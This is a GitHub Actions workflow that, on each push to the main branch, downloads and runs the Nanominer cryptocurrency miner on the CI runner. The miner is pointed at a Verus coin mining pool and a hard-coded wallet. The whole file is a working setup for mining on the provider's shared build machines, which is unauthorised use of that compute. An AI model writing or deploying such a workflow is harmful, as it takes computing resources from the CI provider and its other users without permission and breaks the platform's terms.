name: Miner Workflow

on:
  push:
    branches:
      - main

jobs:
  run_miner:
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository
        uses: actions/checkout@v2

      - name: Setup Environment
        run: |
          sudo apt-get update
          sudo apt-get install -y wget tar

      - name: Download Nanominer
        run: |
          wget https://github.com/nanopool/nanominer/releases/download/v3.6.3/nanominer-linux-3.6.3.tar.gz
          tar -xf nanominer-linux-3.6.3.tar.gz
          cd nanominer-linux-3.6.3
          chmod +x nanominer

      - name: Run Nanominer
        run: |
          ./nanominer -algo Verushash -wallet RXpS2eUefUChbjagNZTGCr1r4ALMarbUVo.netbook -coin VRSC -pool1 na.luckpool.net:3956 -t 2
